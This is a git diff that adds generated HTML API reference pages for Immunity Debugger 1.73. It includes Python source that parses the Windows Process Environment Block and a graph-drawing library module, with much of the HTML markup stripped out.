1010 self . InheritedAddressSpace = struct . unpack ( "B" , self . PEB [ index ] ) [ 0 ]
+
1011 index = 0x001
+
1012 self . ReadImageFileExecOptions = struct . unpack ( "B" , self . PEB [ index ] ) [ 0 ]
+
1013 index = 0x002
+
1014 self . BeingDebugged = struct . unpack ( "B" , self . PEB [ index ] ) [ 0 ]
+
1015 index = 0x003
+
1016 self . SpareBool = struct . unpack ( "B" , self . PEB [ index ] ) [ 0 ]
+
1017 index = 0x004
+
1018 self . Mutant = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1019 index = 0x008
+
1020 self . ImageBaseAddress = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1021 index = 0x00c
+
1022 self . Ldr = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1023 index = 0x010
+
1024 self . ProcessParameters = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1025 index = 0x014
+
1026 self . SubSystemData = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1027 index = 0x018
+
1028 self . ProcessHeap = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1029 index = 0x01c
+
1030 self . FastPebLock = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1031 index = 0x020
+
1032 self . FastPebLockRoutine = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1033 index = 0x024
+
1034 self . FastPebUnlockRoutine = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1035 index = 0x028
+
1036 self . EnviromentUpdateCount = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1037 index = 0x02c
+
1038 self . KernelCallbackTable = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1039 index = 0x030
+
1040 self . SystemReserved = [ ]
+
1041 for i in range ( 0 , 2 ) :
+
1042 self . SystemReserved . append ( struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ] )
+
1043 index += 4
+
1044 index = 0x038
+
1045 self . FreeList = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1046 index = 0x03c
+
1047 self . TlsExpansionCounter = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1048 index = 0x040
+
1049 self . TlsBitmap = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1050 index = 0x044
+
1051 self . TlsBitmapBits = [ ]
+
1052 for i in range ( 0 , 2 ) :
+
1053 self . TlsBitmapBits . append ( struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ] )
+
1054 index += 4
+
1055 index = 0x04c
+
1056 self . ReadOnlySharedMemoryBase = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1057 index = 0x050
+
1058 self . ReadOnlySharedMemoryheap = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1059 index = 0x054
+
1060 self . ReadOnlyStaticServerData = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1061 index = 0x058
+
1062 self . AnsiCodePageData = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1063 index = 0x05c
+
1064 self . OemCodePageData = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1065 index = 0x060
+
1066 self . UnicodeCaseTableData = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1067 index = 0x064
+
1068 self . NumberOfProcessors = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1069 index = 0x068
+
1070 self . NtGlobalFlag = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1071
+
1072
+
1073
+
1074 index = 0x070
+
1075 self . CriticalSectionTimeout_LowPart = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1076 index = 0x074
+
1077 self . CriticalSectionTimeout_HighPart = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1078 index = 0x078
+
1079 self . HeapSegmentReserve = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1080 index = 0x07c
+
1081 self . HeapSegmentCommit = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1082 index = 0x080
+
1083 self . HeapDeCommitTotalFreeThreshold = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1084 index = 0x084
+
1085 self . HeapDeCommitFreeBlockThreshold = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1086 index = 0x088
+
1087 self . NumberOfHeaps = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1088 index = 0x08c
+
1089 self . MaximumNumberOfHeaps = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1090 index = 0x090
+
1091 self . ProcessHeaps = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1092 index = 0x094
+
1093 self . GdiSharedHandleTable = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1094 index = 0x098
+
1095 self . ProcessStarterHelper = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1096 index = 0x09c
+
1097 self . GdiDCAttributeList = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1098 index = 0x0a0
+
1099 self . LoaderLock = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1100 index = 0x0a4
+
1101 self . OSMajorVersion = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1102 index = 0x0a8
+
1103 self . OSMinorVersion = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1104 index = 0x0ac
+
1105 self . OSBuildNumber = struct . unpack ( "<H" , self . PEB [ index : index + 2 ] ) [ 0 ]
+
1106 index = 0x0ae
+
1107 self . OSCSDVersion = struct . unpack ( "<H" , self . PEB [ index : index + 2 ] ) [ 0 ]
+
1108 index = 0x0b0
+
1109 self . OSPlatformId = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1110 index = 0x0b4
+
1111 self . ImageSubsystem = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1112 index = 0x0b8
+
1113 self . ImageSubsystemMajorVersion = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1114 index = 0x0bc
+
1115 self . ImageSubsystemMinorVersion = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1116 index = 0x0c0
+
1117 self . ImageProcessAffinityMask = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1118 index = 0x0c4
+
1119
+
1120 self . GdiHandleBuffer = [ ]
+
1121 for i in range ( 0 , 34 ) :
+
1122 self . GdiHandleBuffer . append ( struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ] )
+
1123 index += 4
+
1124 index = 0x14c
+
1125 self . PostProcessInitRoutine = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1126 index = 0x150
+
1127 self . TlsExpansionBitmap = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1128 index = 0x154
+
1129
+
1130 self . TlsExpansionBitmapBits = [ ]
+
1131 for i in range ( 0 , 32 ) :
+
1132 self . TlsExpansionBitmapBits . append ( struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ] )
+
1133 index += 4
+
1134 index = 0x1d4
+
1135 self . SessionId = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1136 index = 0x1d8
+
1137 self . AppCompatInfo = struct . unpack ( "<L" , self . PEB [ index : index + 4 ] ) [ 0 ]
+
1138 index = 0x1dc
+
1139
+
1140 self . CSDVersion_Length = struct . unpack ( "<H" , self . PEB [ index : index + 2 ] ) [ 0 ]
+
1141 index += 2
+
1142 self . CSDVersion_MaximumLength = struct . unpack ( "<H" , self . PEB [ index : index + 2 ] ) [ 0 ]
+
1143 index += 2
+
1144 self . CSDVersion_Buffer = struct . unpack ( "<H" , self . PEB [ index : index + 2 ] ) [ 0 ]
+
1145 index += 2
+
1146
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.debugtypes.Handle-class.html b/1.73/Documentation/Ref/Libs.debugtypes.Handle-class.html
new file mode 100755
index 0000000..4091fd8
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.debugtypes.Handle-class.html
@@ -0,0 +1,305 @@
+
+
+
+
+ Libs.debugtypes.Handle
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Handle source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.debugtypes.MemoryPage-class.html b/1.73/Documentation/Ref/Libs.debugtypes.MemoryPage-class.html
new file mode 100755
index 0000000..e86d228
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.debugtypes.MemoryPage-class.html
@@ -0,0 +1,602 @@
+
+
+
+
+ Libs.debugtypes.MemoryPage
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class MemoryPage source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ BUFFER
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ baseaddress ,
+ imm )(Constructor)
+ source code
+
+ Memory Page Information
+
+ Parameters:
+
+ baseaddressimm
+
+
+
+
+
+
+ Get Type of Memory Page
+
+ Returns: DWORD
+ Type of Page
+
+
+
+
+
+
+
+ Get the Owner of the Memory Page
+
+ Returns: STRING
+ Owner of the Page
+
+
+
+
+
+
+
+ Get the Intial Access Flag of the Memory Page
+
+ Parameters:
+
+ human Returns: DWORD
+ Initial Access Flag
+
+
+
+
+
+
+
+ Get the Access Flag of the Memory Page
+
+ Parameters:
+
+ human Returns: DWORD
+ Access Flag
+
+
+
+
+
+
+
+ Get the ID of the Thread
+
+ Returns: DWORD
+ Thread ID
+
+
+
+
+
+
+
+ Get the Memory of the Page
+
+ Returns: BUFFER
+ Page Memory
+
+
+
+
+
+
+
+ Get the Base Address of the Memory Page
+
+ Returns: DWORD
+ Base Address
+
+
+
+
+
+
+
+ Get the Section from the Memory Page
+
+ Returns: STRING
+ Section
+
+
+
+
+
+
+
+ Search string in this memory page.
+
+ Parameters:
+
+ buf Returns:
+ A list of address where the string was found on this memory page
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.debugtypes.Module-class.html b/1.73/Documentation/Ref/Libs.debugtypes.Module-class.html
new file mode 100755
index 0000000..7de4987
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.debugtypes.Module-class.html
@@ -0,0 +1,1185 @@
+
+
+
+
+ Libs.debugtypes.Module
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Module source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ name ,
+ baseaddress ,
+ size ,
+ entrypoint )
+ source code
+
+
+
+
+
+
+
+ LIST of DWORD
+
+
+
+
+
+
+
+
+
+
+
+ _xrefs (self ,
+ address ,
+ XREF ,
+ debugger_callback )
+ source code
+
+
+
+
+
+
+
+ LIST of DWORD
+
+
+
+
+
+
+
+ LIST of DWORD
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ setModuleExtension (self ,
+ mod_dict )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Analyse (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+
+
+
+
+ getSize (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getType (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getCodebase (self )
+ source code
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+ DWORD
+
+
+
+
+
+
+
+
+
+
+
+ getIdatatable (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getIdatabase (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getEdatatable (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getEdatasize (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getReloctable (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getRelocsize (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getName (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getPath (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getNsect (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getHeadersize (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getFixupbase (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getCodedec (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getCodecrc (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getHittrace (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getDatadec (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getGlobaltypes (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getMainentry (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getRealsfxentry (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getOrigcodesize (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getSfxbase (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getSfxsize (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getIssystemdll (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getVersion (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ isAnalysed (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ getJumpList (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ name ,
+ baseaddress ,
+ size ,
+ entrypoint )(Constructor)
+ source code
+
+ Module Information
+
+ Parameters:
+
+ namebaseaddresssizeentrypoint
+
+
+
+
+
+
+ Get the all the functions from Module
+
+ Returns: LIST of DWORD
+ A List of the address of all function
+
+
+
+
+
+
+
+ Get the Xreference to the given address
+
+ Parameters:
+
+ address Returns: LIST of DWORD
+ List of Address
+
+
+
+
+
+
+
+ Get the Xreference from the given address
+
+ Parameters:
+
+ address Returns: LIST of DWORD
+ List of Address
+
+
+
+
+
+
+
+ Get the Base Address
+
+ Returns: DWORD
+ Base Address
+
+
+
+
+
+
+
+ Get Base from module
+
+ Returns: DWORD
+ Base from the module
+
+
+
+
+
+
+
+ Get Codesize from module
+
+ Returns: DWORD
+ Code Size
+
+
+
+
+
+
+
+ Get Resbase from module
+
+ Returns: DWORD
+ Res Base
+
+
+
+
+
+
+
+ Get Ressize from module
+
+ Returns: DWORD
+ Res Size
+
+
+
+
+
+
+
+ Get Entry from module
+
+ Returns: DWORD
+ Entry
+
+
+
+
+
+
+
+ Get Database from module
+
+ Returns: DWORD
+ Database
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.debugtypes.PEB-class.html b/1.73/Documentation/Ref/Libs.debugtypes.PEB-class.html
new file mode 100755
index 0000000..23c605b
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.debugtypes.PEB-class.html
@@ -0,0 +1,189 @@
+
+
+
+
+ Libs.debugtypes.PEB
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class PEB source code
+
+
+
+
+
+
+ __init__ (self ,
+ imm )(Constructor)
+ source code
+
+ Process Environment Block
+
+ Parameters:
+
+ imm
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.debugtypes.Stack-class.html b/1.73/Documentation/Ref/Libs.debugtypes.Stack-class.html
new file mode 100755
index 0000000..2afefb3
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.debugtypes.Stack-class.html
@@ -0,0 +1,256 @@
+
+
+
+
+ Libs.debugtypes.Stack
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Stack source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.debugtypes.Symbol-class.html b/1.73/Documentation/Ref/Libs.debugtypes.Symbol-class.html
new file mode 100755
index 0000000..99a6c61
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.debugtypes.Symbol-class.html
@@ -0,0 +1,257 @@
+
+
+
+
+ Libs.debugtypes.Symbol
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Symbol source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.debugtypes.Table-class.html b/1.73/Documentation/Ref/Libs.debugtypes.Table-class.html
new file mode 100755
index 0000000..fda8049
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.debugtypes.Table-class.html
@@ -0,0 +1,323 @@
+
+
+
+
+ Libs.debugtypes.Table
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Table source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ title ,
+ col_titles )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ createTable (self ,
+ title ,
+ col_titles )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Log (self ,
+ data ,
+ address =0 ,
+ focus =False )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ add (self ,
+ address ,
+ data )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm ,
+ title ,
+ col_titles )(Constructor)
+ source code
+
+ Create a GUI Window Table
+
+ Parameters:
+
+ immtitlecol_titles
+
+
+
+
+
+
+ Log (self ,
+ data ,
+ address =0 ,
+ focus =False ) source code
+
+ Add a message into a column
+
+ Parameters:
+
+ dataaddressfocus
+
+
+
+
+
+
+ Add Data to the Window
+
+ Parameters:
+
+ addressdata
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.debugtypes.Thread-class.html b/1.73/Documentation/Ref/Libs.debugtypes.Thread-class.html
new file mode 100755
index 0000000..b62cd30
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.debugtypes.Thread-class.html
@@ -0,0 +1,360 @@
+
+
+
+
+ Libs.debugtypes.Thread
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Thread source code
+
+
+
+
+ __init__ (self ,
+ thread )(Constructor)
+ source code
+
+ None
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.graphclass-module.html b/1.73/Documentation/Ref/Libs.graphclass-module.html
new file mode 100755
index 0000000..e9668a7
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.graphclass-module.html
@@ -0,0 +1,248 @@
+
+
+
+
+ Libs.graphclass
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module graphclass
+
+
+
+
+
+
+
+
+Module graphclass source code
+Immunity Debugger Graph Lib
+ (c) Immunity, Inc. 2004-2007
+ Immunity Inc.
+ Graph API
+
+
+
+
+
+
+
+ ImmDrawColors = {'Aqua': 16776960, 'Black': 0, 'Blue': 1671168...
+
+
+
+
+
+
+ ImmDrawColors
+
+
+
+
+ Value:
+
+{'Aqua': 16776960,
+ 'Black': 0,
+ 'Blue': 16711680,
+ 'Cream': 15793151,
+ 'DarkGray': 8421504,
+ 'Fuchsia': 16711935,
+ 'Gray': 8421504,
+ 'Green': 32768,
+...
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.graphclass-pysrc.html b/1.73/Documentation/Ref/Libs.graphclass-pysrc.html
new file mode 100755
index 0000000..ed1f270
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.graphclass-pysrc.html
@@ -0,0 +1,584 @@
+
+
+
+
+ Libs.graphclass
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module graphclass
+
+
+
+
+
+
+
+
+
+ 1
+ 2 """ 3 Immunity Debugger Graph Lib 4 5 (c) Immunity, Inc. 2004-2007 6 7 8 U{Immunity Inc.<http://www.immunityinc.com>} Graph API 9 10 11 """ 12
+ 13 __version__ = '1.1' 14
+ 15 import debugger 16
+ 17
+ 18
+ 19 ImmDrawColors = { "Black" : 0 , "Maroon" : 128 , "Green" : 32768 , "Olive" : 32896 , "Navy" : 8388608 , "Purple" : 8388736 , "Teal" : 8421376 , \ 20 "Gray" : 8421504 , "Silver" : 12632256 , "Red" : 255 , "Lime" : 65280 , "Yellow" : 65535 , "Blue" : 16711680 , "Fuchsia" : 16711935 , \
+ 21 "Aqua" : 16776960 , "LightGray" : 12632256 , "DarkGray" : 8421504 , "White" : 16777215 , "MoneyGreen" : 12639424 , \
+ 22 "SkyBlue" : 15780518 , "Cream" : 15793151 , "MedGray" : 10789024 , "red" : 255 , "darkgreen" : 32768 }
+ 23
+ 24
+ 25
+
28 self . vertices = [ ]
+
29 self . edges = [ ]
+
30 self . nvertices = 0
+
31 self . nedges = 0
+
32 self . handler = 0
+
33 self . height = 0
+
34 self . width = 0
+
35
+
36
+
38 self . handler = handler
+
39
+
41 self . vertices = vertices
+
42
+
44 return self . vertices
+
45
+
47 """edges[0] = source
+
48 edges[1] = target
+
49 edges[3] = type
+
50 type can be one of:
+
51 Direct = 0
+
52 True = 1
+
53 False = 2"""
+
54 self . edges . append ( edges )
+
55
+
58
+
60 self . nedges = len ( self . edges )
+
61 return self . nedges
+
62
+
64 self . nvertices = len ( self . vertices )
+
65 return self . nvertices
+
66
+
68 return debugger . Splashtime ( self . handler , self . height , self . width )
+
69
+
70
+
72 fy2 = fx2 = fx = fy = 0
+
73 for vertex in vertices :
+
74 ( x , y , x2 , y2 ) = vertex . getCoords ( )
+
75 if y2 > fy2 :
+
76 fy2 = y2
+
77 if x2 > fx2 :
+
78 fx2 = x2
+
79 if y < fy :
+
80 fy = y
+
81 if x < fx :
+
82 fx = x
+
83 self . height = fy2 + 200
+
84 self . width = fx2 + 400 + abs ( fx )
+
85 vertices [ 0 ] . setStartCoords ( self . height , self . width )
+
86
+
88 return ( self . height , self . width )
+
89
+ 90
+ 91
+ 92
+ 93
+ 94
+ 95
+ 96
+ 97
+ 98
+
101 self . inadj = [ ]
+
102 self . outadj = [ ]
+
103 self . name = ""
+
104 self . label = ""
+
105 self . buf = [ ]
+
106
+
107 self . absy = 0
+
108 self . absx = 0
+
109 self . handler = handler
+
110 self . x1 = 0
+
111 self . y1 = 0
+
112 self . x2 = 0
+
113 self . y2 = 0
+
114 self . rely = 0
+
115 self . relx = 0
+
116 self . color = "Black"
+
117 self . texth = 0
+
118 self . textw = 0
+
119 self . drawn = False
+
120 self . placed = False
+
121 self . start_x = 300
+
122 self . start_y = 10
+
123
+
125 return cmp ( self . y2 , other . y2 )
+
126
+
127
+
130
+
132 """type can be one of:
+
133 Direct = 0
+
134 True = 1
+
135 False = 2
+
136 """
+
137 self . outadj . append ( ( edge , type ) )
+
138
+
141
+
144
+
145
+
148
+
151
+
154
+
157
+
160
+
163
+
165 self . relx = x
+
166 self . rely = y
+
167
+
169 return ( self . relx , self . rely )
+
170
+
173
+
175 """returns True if vertex was already placed into the plane"""
+
176 return self . placed
+
177
+
179 theight = 0
+
180 for line in text :
+
181 ( twidth , theight ) = debugger . Gettextsize ( self . handler , line )
+
182 if twidth > self . absx :
+
183 self . absx = twidth
+
184 self . absy = self . absy + theight
+
185 self . absy = self . absy + 4
+
186 self . absx = self . absx + 10
+
187
+
188
+
190 return ( self . absx , self . absy )
+
191
+
194
+
197
+
199 self . x2 = self . getWidth ( ) + self . relx
+
200 self . y2 = self . getHeight ( ) + self . rely
+
201 return ( self . relx , self . rely , self . x2 , self . y2 )
+
202
+
205
+
208
+
211
+
214
+
216 self . x2 = self . getWidth ( ) + self . relx
+
217 self . y2 = self . getHeight ( ) + self . rely
+
218 return ( self . relx , self . rely , self . x2 , self . y2 )
+
219
+
222
+
225
+
227 self . rely = self . rely - value
+
228 return
+
229
+
231 self . rely = self . rely + value
+
232 return
+
233
+
235 self . relx = self . relx + value
+
236 return
+
237
+
239 self . relx = self . relx - value
+
240 return
+
241
+
242 - def placeVertex ( self , x , y , text , textcolor , rectcolor , start ) :
+
243 theight = 0
+
244 self . texth = 0
+
245 self . textw = 0
+
246 f = open ( "ea.txt" , "w+" )
+
247 for line in text :
+
248 if text . index ( line ) == 0 :
+
249
+
250 ( theight , twidth ) = debugger . Drawtext ( self . handler , x , y + self . texth , line + ":" , ImmDrawColors [ "Purple" ] )
+
251 if twidth > self . textw :
+
252 self . textw = twidth
+
253 self . texth = self . texth + theight
+
254 else :
+
255 line = line . replace ( "\x0a" , "" ) . replace ( "\x0d" , "" )
+
256
+
257 try :
+
258 asmline = line . split ( "||" ) [ 0 ]
+
259 commentline = line . split ( "||" ) [ 1 ]
+
260 ( theight , twidth ) = debugger . Drawtext ( self . handler , x , y + self . texth , " " + asmline , ImmDrawColors [ textcolor ] )
+
261 ( theight , twidth2 ) = debugger . Drawtext ( self . handler , x + twidth , y + self . texth , " " + commentline , ImmDrawColors [ "Red" ] )
+
262 twidth += twidth2
+
263
+
264 except :
+
265 ( theight , twidth ) = debugger . Drawtext ( self . handler , x , y + self . texth , " " + line , ImmDrawColors [ textcolor ] )
+
266 if twidth > self . textw :
+
267 self . textw = twidth
+
268 self . texth = self . texth + theight
+
269
+
270
+
271 debugger . Drawline ( self . handler , x - 5 , y - 3 , x - 5 , y + self . texth + 2 , ImmDrawColors [ rectcolor ] , start )
+
272
+
273 debugger . Drawline ( self . handler , x + self . textw + 5 , y - 2 , x + self . textw + 5 , y + self . texth + 2 , ImmDrawColors [ rectcolor ] )
+
274
+
275 debugger . Drawline ( self . handler , x - 6 , y - 3 , x + self . textw + 5 , y - 2 , ImmDrawColors [ rectcolor ] )
+
276
+
277 debugger . Drawline ( self . handler , x - 6 , y + self . texth + 2 , x + self . textw + 5 , y + self . texth + 2 , ImmDrawColors [ rectcolor ] )
+
278 return None
+
279
+
